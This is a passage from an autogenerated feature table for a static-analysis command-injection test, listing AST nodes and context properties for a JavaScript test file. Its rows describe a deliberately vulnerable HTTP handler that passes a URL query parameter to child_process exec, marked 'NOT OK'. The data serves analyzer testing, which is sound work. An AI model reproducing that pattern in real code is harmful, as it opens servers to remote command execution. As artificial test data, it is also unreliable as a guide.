autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:17:67:20 | args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:8 | util | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:8 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:8 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:8 | util | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:26 | util | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:26 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:26 | util | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:26 | util = ... "util") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:26 | util = ... "util") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:5:70:26 | util = ... "util") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:18 | require | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:18 | require | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:26 | exceptional return of require("util") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:26 | exceptional return of require("util") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:26 | exceptional return of require("util") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:26 | require("util") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:26 | require("util") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:12:70:26 | require("util") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:20:70:25 | "util" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:20:70:25 | "util" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:20:70:25 | "util" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:20:70:25 | "util" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:20:70:25 | "util" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:70:20:70:25 | "util" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:72:4 | http | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:72:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:72:4 | http | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:72:17 | http.createServer | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:72:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:72:17 | http.createServer | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:76:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:76:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:76:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:76:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:76:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:1:76:2 | http.cr ... T OK\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:6:72:17 | createServer | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:6:72:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:6:72:17 | createServer | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | cp | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | this | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | this | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | this | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | url | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | util | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | util | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | util | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:72:18 | util | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | 'arguments' object of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | exceptional return of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | exceptional return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | exceptional return of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | functio ... OT OK\\n} | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | functio ... OT OK\\n} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | functio ... OT OK\\n} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | return of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:19:76:1 | return of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:28:72:30 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:33:72:35 | res | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:33:72:35 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:33:72:35 | res | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:33:72:35 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:72:33:72:35 | res | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:11 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:11 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:11 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:11 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:11 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd = u ... ry.path | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd = u ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd = u ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd = u ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:9:73:49 | cmd = u ... ry.path | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:17 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:17 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:17 | url | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:17 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:17 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:23 | url.parse | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:23 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:23 | url.parse | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:23 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:23 | url.parse | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | exceptional return of url.par ... , true) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | exceptional return of url.par ... , true) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | url.par ... , true) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:38 | url.par ... , true) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:44 | url.par ... ).query | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:44 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:44 | url.par ... ).query | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:44 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:44 | url.par ... ).query | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:49 | url.par ... ry.path | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:49 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:49 | url.par ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:49 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:15:73:49 | url.par ... ry.path | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:19:73:23 | parse | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:19:73:23 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:19:73:23 | parse | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:19:73:23 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:19:73:23 | parse | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:27 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:27 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:27 | req | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:27 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:27 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:25:73:31 | req.url | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:29:73:31 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:29:73:31 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:29:73:31 | url | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:29:73:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:29:73:31 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| 